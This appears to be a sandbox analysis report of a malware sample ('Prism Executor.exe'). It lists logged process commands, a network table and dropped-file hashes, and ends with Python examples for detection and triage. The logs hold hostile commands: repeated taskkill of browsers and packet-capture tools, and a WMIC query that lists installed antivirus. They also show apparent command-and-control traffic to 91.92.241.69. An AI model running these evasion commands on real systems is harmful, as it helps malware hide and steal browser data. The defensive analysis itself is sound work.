C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe
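The kill loop recorded above, turned into detection logic as an added example that is not part of the sandbox's report or tooling: it consumes (image path, command line) process-creation events, pulls the `/IM` target out of every `taskkill`, buckets it against the capture-tool, browser and messenger names that appear in this report, and separately flags the WMIC query of the SecurityCenter2 WMI namespace for AntivirusProduct. The event shape, the flag thresholds and the benign notepad.exe event are assumptions for illustration; the tool and browser lists are copied from the commands above.

```python
"""Detection example: a burst of `taskkill /F /IM <tool>` against capture and
proxy tools and browsers, plus a WMIC query of the SecurityCenter2 namespace to
list installed AV products. Input events are (image_path, command_line) pairs,
the shape a Sysmon Event ID 1 or EDR process-creation feed provides (assumed)."""
import ntpath
import re
from dataclasses import dataclass, field

# Image names taken from the taskkill commands recorded in this report.
ANALYSIS_TOOLS = {"tcpdump.exe", "windump.exe", "dumpcap.exe", "tshark.exe",
                  "wireshark.exe", "ettercap.exe", "fiddler.exe",
                  "httpdebuggerui.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "opera.exe",
            "iexplore.exe", "brave.exe", "vivaldi.exe"}
MESSENGERS = {"telegram.exe"}

# taskkill [/F ...] /IM <image>: skip leading switches, tolerate the
# cmd.exe /c "..." wrapper, stop the capture at whitespace or a quote.
TASKKILL_RE = re.compile(r'taskkill\b(?:\s+/\w+)*?\s+/im\s+"?([^\s"]+)',
                         re.IGNORECASE)
# WMI Security Center query that enumerates registered AV products.
AV_ENUM_RE = re.compile(r'root\\securitycenter2.*antivirusproduct',
                        re.IGNORECASE)


def extract_kill_target(cmdline):
    """Return the lower-cased image name given to taskkill /IM, or None."""
    m = TASKKILL_RE.search(cmdline)
    return m.group(1).lower() if m else None


@dataclass
class Findings:
    analysis_tools_killed: set = field(default_factory=set)
    browsers_killed: set = field(default_factory=set)
    messengers_killed: set = field(default_factory=set)
    other_killed: set = field(default_factory=set)
    av_enumeration: bool = False

    def verdict(self):
        """Human-readable flags; the thresholds are illustrative (assumed)."""
        flags = []
        if len(self.analysis_tools_killed) >= 3:
            flags.append("analysis-tool termination")
        if len(self.browsers_killed) >= 2:
            # Closing browsers releases the locks on their profile databases.
            flags.append("browser termination")
        if self.av_enumeration:
            flags.append("AV product enumeration via SecurityCenter2")
        return flags


def analyze(events):
    f = Findings()
    for image, cmdline in events:
        # Count only the taskkill.exe child: the cmd.exe /c wrapper that
        # spawned it is logged too and would otherwise double-count the kill.
        if ntpath.basename(image).lower() == "taskkill.exe":
            target = extract_kill_target(cmdline)
            if target in ANALYSIS_TOOLS:
                f.analysis_tools_killed.add(target)
            elif target in BROWSERS:
                f.browsers_killed.add(target)
            elif target in MESSENGERS:
                f.messengers_killed.add(target)
            elif target:
                f.other_killed.add(target)
        # The AV query is matched on the command line alone so it fires whether
        # the logged image is WMIC.exe or the cmd.exe that wrapped it.
        if AV_ENUM_RE.search(cmdline):
            f.av_enumeration = True
    return f


# Constructed sample feed: command lines copied from this report plus one
# benign admin kill (notepad.exe) that must not raise the tool/browser flags.
SAMPLE_EVENTS = [
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"'),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM wireshark.exe"),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM tshark.exe"),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM tcpdump.exe"),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM chrome.exe"),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM msedge.exe"),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM Telegram.exe"),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM notepad.exe"),
    (r"C:\Windows\System32\Wbem\WMIC.exe",
     r"WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path "
     r"AntivirusProduct Get displayName"),
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    print(sorted(result.analysis_tools_killed), result.verdict())
```

A single `taskkill` against a browser is routine admin activity; what makes this sample stand out is the breadth (every major browser plus every common packet-capture and HTTP-proxy tool) repeated in a loop, which is why the flags key on the number of distinct targets rather than on any one command.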

Network

Country  Destination         Domain                         Proto
US       8.8.8.8:53          228.249.119.40.in-addr.arpa    udp
US       8.8.8.8:53          172.214.232.199.in-addr.arpa   udp
US       8.8.8.8:53          ip-api.com                     udp
US       208.95.112.1:80     ip-api.com                     tcp
US       8.8.8.8:53          1.112.95.208.in-addr.arpa      udp
US       8.8.8.8:53          74.32.126.40.in-addr.arpa      udp
US       8.8.8.8:53          157.123.68.40.in-addr.arpa     udp
US       8.8.8.8:53          206.23.85.13.in-addr.arpa      udp
US       8.8.8.8:53          57.15.31.184.in-addr.arpa      udp
NL       91.92.241.69:5555   -                              tcp
US       8.8.8.8:53          69.241.92.91.in-addr.arpa      udp
US       8.8.8.8:53          58.55.71.13.in-addr.arpa       udp
US       8.8.8.8:53          144.107.17.2.in-addr.arpa      udp
US       8.8.8.8:53          13.227.111.52.in-addr.arpa     udp
US       8.8.8.8:53          -                              tcp
NL       91.92.241.69:6060   91.92.241.69                   tcp
US       8.8.8.8:53          api.ipify.org                  udp
US       104.26.12.205:443   api.ipify.org                  tcp
US       8.8.8.8:53          ipinfo.io                      udp
US       34.117.186.192:443  ipinfo.io                      tcp
US       8.8.8.8:53          205.12.26.104.in-addr.arpa     udp
US       8.8.8.8:53          freeimage.host                 udp
US       104.21.22.122:443   freeimage.host                 tcp
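The Network table parsed and triaged, as an added example that is not part of the original report. The row text is copied from the table; the classes (reverse-DNS background noise, ordinary DNS, the external-IP lookup services behind the "Looks up external IP address via web service" signature, plain web traffic, and direct-to-IP TCP on a port other than 80/443) and the host list are assumptions for illustration. The "candidate" label on the 91.92.241.69 rows is a heuristic to confirm against the sample's extracted configuration, not a statement the report makes.

```python
"""Parse the flattened Network table from this report and sort each row into
a triage class. Row text is copied from the table; classes are assumed."""
import ipaddress
from collections import defaultdict

# Public "what is my IP" services the report shows the sample contacting.
IP_LOOKUP_HOSTS = {"ip-api.com", "api.ipify.org", "ipinfo.io"}
WEB_PORTS = {80, 443}

NETWORK_TABLE = """
Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
NL 91.92.241.69:5555 tcp
US 8.8.8.8:53 69.241.92.91.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 freeimage.host udp
US 104.21.22.122:443 freeimage.host tcp
"""


def parse_network_table(text):
    """Return one dict per data row. Rows have 3 or 4 whitespace-separated
    fields: the Domain column is absent (or "-") for direct-IP connections."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if not parts or parts[0] == "Country":  # blank or header row
            continue
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            raise ValueError(f"unexpected row: {line!r}")
        host, _, port = dest.rpartition(":")
        ipaddress.ip_address(host)  # raises if Destination is not an IP literal
        rows.append({"country": country, "ip": host, "port": int(port),
                     "domain": "" if domain == "-" else domain,
                     "proto": proto.lower()})
    return rows


def classify(row):
    domain = row["domain"]
    if domain.endswith(".in-addr.arpa"):
        return "reverse-dns"   # PTR lookups, mostly sandbox/OS background
    if row["port"] == 53:
        return "dns"           # includes the TCP fallback row with no name
    if domain in IP_LOOKUP_HOSTS:
        return "external-ip-lookup"
    # No hostname (or the hostname is just the IP again) on a port other than
    # 80/443: direct-to-IP beaconing, the shape of a RAT's configured C2.
    if (not domain or domain == row["ip"]) and row["port"] not in WEB_PORTS \
            and row["proto"] == "tcp":
        return "direct-ip-nonstandard-port"
    return "web" if row["port"] in WEB_PORTS else "other"


def summarize(rows):
    """Group rows by class and pull out the two lists an analyst acts on."""
    by_class = defaultdict(list)
    for r in rows:
        by_class[classify(r)].append(r)
    c2 = sorted({f'{r["ip"]}:{r["port"]}'
                 for r in by_class.get("direct-ip-nonstandard-port", [])})
    lookups = sorted({r["domain"]
                      for r in by_class.get("external-ip-lookup", [])})
    return {"c2_candidates": c2, "ip_lookup_services": lookups,
            "counts": {k: len(v) for k, v in by_class.items()}}


if __name__ == "__main__":
    summary = summarize(parse_network_table(NETWORK_TABLE))
    print(summary["c2_candidates"], summary["ip_lookup_services"])
```

The ordering of the checks matters: the UDP lookup of ip-api.com is a DNS query and is classed as such, while the later TCP session to 208.95.112.1:80 with the same name is the actual external-IP request, so the two rows land in different buckets even though they share a hostname.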

Files

C:\Users\Admin\dllhost.exe

MD5 4a7f75343aaa5a4d8d18add50ccf3139
SHA1 110c62eee6d7deb4aa9d601c942eae43482d2125
SHA256 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e
SHA512 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

memory/4492-31-0x00007FFAE3683000-0x00007FFAE3685000-memory.dmp

memory/4492-33-0x00000000004C0000-0x00000000004DA000-memory.dmp

C:\Users\Admin\Prism Executor.exe

MD5 fa819e23d8fee4ea89aaaea55e0b28f5
SHA1 18335d4e0d140dcab66c7197c57f669251898ce5
SHA256 bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c
SHA512 e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

memory/3220-425-0x0000000002FA0000-0x0000000002FD6000-memory.dmp

memory/4088-518-0x0000000005830000-0x0000000005E58000-memory.dmp

memory/3220-893-0x0000000005E90000-0x0000000005EB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe

MD5 58545dc488990ac11872079d119f8284
SHA1 dade5c16834d582a5187041697cc5a7c2eae2f88
SHA256 6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc
SHA512 93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

memory/3220-979-0x0000000005F30000-0x0000000005F96000-memory.dmp

memory/4088-980-0x0000000006040000-0x00000000060A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ieynfblg.esp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
